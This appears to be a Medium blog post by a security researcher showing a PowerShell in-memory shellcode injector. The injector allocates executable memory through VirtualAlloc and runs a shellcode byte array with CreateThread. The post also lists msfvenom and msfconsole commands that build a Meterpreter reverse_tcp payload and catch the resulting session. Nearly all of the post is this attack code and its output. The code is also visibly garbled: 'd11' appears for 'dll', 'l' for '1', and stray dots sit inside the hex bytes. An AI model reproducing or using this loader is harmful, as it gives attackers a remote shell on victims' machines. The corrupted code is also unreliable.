Simple In-Memory Injection

$pos= '[DllImport("kernel32.d11")] 
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwpysize, uint flAllocationType, uint flProtect);[DllImport("kerne132.d11")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackpysize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$malFunc = Add-Type -memberDefinition $pos -Name 11Win32" -namespace Win32Functions -p assthru;
[Byte []];
[Byte[]] $pyld = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0xl4,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x.26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xcl,0xcf,0xd,0xl,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0xl0,0x8b,0x4a,0x3c,0x8b,0x4c,0xll,0x78,0xe3,0x48,0xl,0xdl,0x51,0x8b,0x59,0x20,0xl,0xd3,0x8b,0x49,0xl8, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0xl, 0xd6, 0x31, 0xff, 0.xac, 0xcl,0xcf,0xd,0xl,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0xl,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0xlc,0xl,0xd3,0x8b,0x4,0x8b,0xl,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0xl2,0xeb,0x8d,0x5d,0x68,0x33 ,0x32 ,0x0 ,0x.0, 0x68, 0.x77, 0x73, 0x32 ,0x5f 0x7,0xff,0xd5,x90,0xl,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xac,0x10,0x74,0x8b,0x68,0x2,0x0,0xll,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0xl0,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x61,0x0,0x0,0x0,0x6a,0x06,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x0x24,0xe9,0x71,0xff,0xff,0xff,0xl,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
$pysize= 0x1000;
if ($pyld.Length -gt 0x1000) {$pysize = $pyld.Length};
$z = $malFunc::VirtualAlloc(0,$pysize,0x3000,0x40);
for ($i=0;$i -le ($pyld.Length-1);$i++) {$malFunc::memset([IntPtr]($z.Tolnt32()+$i), $pyld
[$i], 1)} ;
$malFunc::CreateThread(0,0,$z,0,0,0);for (;;) { Start-sleep 60 };
parrot@Userman:-$msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh -o payld.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 410 bytes
Final size of psh file: 3255 bytes
Saved as: payld.ps1
parrot@Userman:-$msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost; set lport 4444; set ExitOnSession false; exploit -j"
[*] Meterpreter session l opened ( -> 
meterpreter > whoami
  1. ,




Prakash Ashok, Security Analyst at WeSecureApp, CTF player, Blockchain developer and Security Researcher.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A Way For Startups to Build a Solid IT Infrastructure

Far More than Cloud: Thoughts on the Future of Database Management Systems

Low-Code Enterprise: Expectations vs. Reality

Make It Double: Multi-field MailChimp Subscribe Forms Available in JetPopup Update v.1.2.0

Launching WebServer on AWS with EFS as Storage Using Terraform

Data Preprocessing — Missing Values

What are Operators in C

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Prakash Ashok, Security Analyst at WeSecureApp, CTF player, Blockchain developer and Security Researcher.

More from Medium

Hack The Box — Lame Writeup

[THM] Ignite Writeup

Everything About Path Traversal Vulnerability

PWN Tips && Tricks — LINUX